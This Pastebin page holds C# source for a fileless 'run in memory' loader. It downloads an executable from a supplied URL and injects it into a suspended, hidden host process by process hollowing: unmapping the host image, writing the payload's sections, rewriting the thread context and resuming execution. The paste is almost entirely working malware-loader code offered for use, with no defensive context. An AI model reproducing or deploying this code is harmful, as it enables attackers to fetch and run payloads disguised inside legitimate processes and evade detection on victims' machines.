API tools faq
paste
Advertisement
setty7

run native in ram

setty7
Aug 30th, 2018
95
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 5.96 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Runtime.InteropServices;
  3.  
  4. namespace AMISS
  5. {
  6. public static unsafe class CMemoryExecute
  7. {
  8.  public struct STARTUPINFO
  9.  {
  10.   public uint cb;
  11.   public string lpReserved;
  12.   public string lpDesktop;
  13.   public string lpTitle;
  14.   public uint dwX;
  15.   public uint dwY;
  16.   public uint dwXSize;
  17.   public uint dwYSize;
  18.   public uint dwXCountChars;
  19.   public uint dwYCountChars;
  20.   public uint dwFillAttribute;
  21.   public uint dwFlags;
  22.   public short wShowWindow;
  23.   public short cbReserved2;
  24.   public IntPtr lpReserved2;
  25.   public IntPtr hStdInput;
  26.   public IntPtr hStdOutput;
  27.   public IntPtr hStdError;
  28.  }
  29.  
  30.  public static void NewTask(string link, string process) {
  31.   var webClient = new WebClient();
  32.            byte[] bin = webClient.DownloadData(link);
  33.  
  34.   Run(bin,process);
  35.  }
  36.  
  37.  public static bool Run(byte[] exeBuffer, string hostProcess, string optionalArguments = "")
  38.  {
  39.   // STARTUPINFO
  40.   STARTUPINFO StartupInfo = new STARTUPINFO();
  41.   StartupInfo.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
  42.   StartupInfo.wShowWindow = SW_HIDE;
  43.  
  44.   var IMAGE_SECTION_HEADER = new byte[0x28]; // pish
  45.   var IMAGE_NT_HEADERS = new byte[0xf8]; // pinh
  46.   var IMAGE_DOS_HEADER = new byte[0x40]; // pidh
  47.   var PROCESS_INFO = new int[0x4]; // pi
  48.   var CONTEXT = new byte[0x2cc]; // ctx
  49.  
  50.   byte* pish;
  51.   fixed (byte* p = &IMAGE_SECTION_HEADER[0])
  52.    pish = p;
  53.  
  54.   byte* pinh;
  55.   fixed (byte* p = &IMAGE_NT_HEADERS[0])
  56.    pinh = p;
  57.  
  58.   byte* pidh;
  59.   fixed (byte* p = &IMAGE_DOS_HEADER[0])
  60.    pidh = p;
  61.  
  62.   byte* ctx;
  63.   fixed (byte* p = &CONTEXT[0])
  64.    ctx = p;
  65.  
  66.   // Set the flag.
  67.   *(uint*)(ctx + 0x0 /* ContextFlags */) = CONTEXT_FULL;
  68.  
  69.   // Get the DOS header of the EXE.
  70.   Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length);
  71.  
  72.   /* Sanity check:  See if we have MZ header. */
  73.   if (*(ushort*)(pidh + 0x0 /* e_magic */) != IMAGE_DOS_SIGNATURE)
  74.    return false;
  75.  
  76.   var e_lfanew = *(int*)(pidh + 0x3c);
  77.  
  78.   // Get the NT header of the EXE.
  79.   Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length);
  80.  
  81.   /* Sanity check: See if we have PE00 header. */
  82.   if (*(uint*)(pinh + 0x0 /* Signature */) != IMAGE_NT_SIGNATURE)
  83.    return false;
  84.  
  85.   // Run with parameters if necessary.
  86.   if (!string.IsNullOrEmpty(optionalArguments))
  87.    hostProcess += " " + optionalArguments;
  88.  
  89.   if (!CreateProcess(null, hostProcess, IntPtr.Zero, IntPtr.Zero, false, CREATE_SUSPENDED, IntPtr.Zero, null, ref StartupInfo, PROCESS_INFO))
  90.    return false;
  91.  
  92.   var ImageBase = new IntPtr(*(int*)(pinh + 0x34));
  93.   NtUnmapViewOfSection((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase);
  94.   if (VirtualAllocEx((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, *(uint*)(pinh + 0x50 /* SizeOfImage */), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) == IntPtr.Zero)
  95.    Run(exeBuffer, hostProcess, optionalArguments); // Memory allocation failed; try again (this can happen in low memory situations)
  96.  
  97.   fixed (byte* p = &exeBuffer[0])
  98.    NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, ImageBase, (IntPtr)p, *(uint*)(pinh + 84 /* SizeOfHeaders */), IntPtr.Zero);
  99.  
  100.   for (ushort i = 0; i < *(ushort*)(pinh + 0x6 /* NumberOfSections */); i++)
  101.   {
  102.    Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length);
  103.    fixed (byte* p = &exeBuffer[*(uint*)(pish + 0x14 /* PointerToRawData */)])
  104.     NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)((int)ImageBase + *(uint*)(pish + 0xc /* VirtualAddress */)), (IntPtr)p, *(uint*)(pish + 0x10 /* SizeOfRawData */), IntPtr.Zero);
  105.   }
  106.  
  107.   NtGetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
  108.   NtWriteVirtualMemory((IntPtr)PROCESS_INFO[0] /* pi.hProcess */, (IntPtr)(*(uint*)(ctx + 0xAC /* ecx */)), ImageBase, 0x4, IntPtr.Zero);
  109.   *(uint*)(ctx + 0xB0 /* eax */) = (uint)ImageBase + *(uint*)(pinh + 0x28 /* AddressOfEntryPoint */);
  110.   NtSetContextThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, (IntPtr)ctx);
  111.   NtResumeThread((IntPtr)PROCESS_INFO[1] /* pi.hThread */, IntPtr.Zero);
  112.  
  113.  
  114.   return true;
  115.  }
  116.  
  117.  #region WinNT Definitions
  118.  
  119.  private const uint CONTEXT_FULL = 0x10007;
  120.  private const int CREATE_SUSPENDED = 0x4;
  121.  private const int MEM_COMMIT = 0x1000;
  122.  private const int MEM_RESERVE = 0x2000;
  123.  private const int PAGE_EXECUTE_READWRITE = 0x40;
  124.  private const ushort IMAGE_DOS_SIGNATURE = 0x5A4D; // MZ
  125.  private const uint IMAGE_NT_SIGNATURE = 0x00004550; // PE00
  126.  
  127.  private static short SW_SHOW = 5;
  128.  private static short SW_HIDE = 0;
  129.  private const uint STARTF_USESTDHANDLES = 0x00000100;
  130.  private const uint STARTF_USESHOWWINDOW = 0x00000001;
  131.  
  132.  
  133.  #region WinAPI
  134.  [DllImport("kernel32.dll", SetLastError = true)]
  135.  private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, int[] lpProcessInfo);
  136.  
  137.  [DllImport("kernel32.dll", SetLastError = true)]
  138.  private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
  139.  
  140.  [DllImport("ntdll.dll", SetLastError = true)]
  141.  private static extern uint NtUnmapViewOfSection(IntPtr hProcess, IntPtr lpBaseAddress);
  142.  
  143.  [DllImport("ntdll.dll", SetLastError = true)]
  144.  private static extern int NtWriteVirtualMemory(IntPtr hProcess, IntPtr lpBaseAddress, IntPtr lpBuffer, uint nSize, IntPtr lpNumberOfBytesWritten);
  145.  
  146.  [DllImport("ntdll.dll", SetLastError = true)]
  147.  private static extern int NtGetContextThread(IntPtr hThread, IntPtr lpContext);
  148.  
  149.  [DllImport("ntdll.dll", SetLastError = true)]
  150.  private static extern int NtSetContextThread(IntPtr hThread, IntPtr lpContext);
  151.  
  152.  [DllImport("ntdll.dll", SetLastError = true)]
  153.  private static extern uint NtResumeThread(IntPtr hThread, IntPtr SuspendCount);
  154.  #endregion
  155.  
  156.  #endregion
  157. }
  158. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!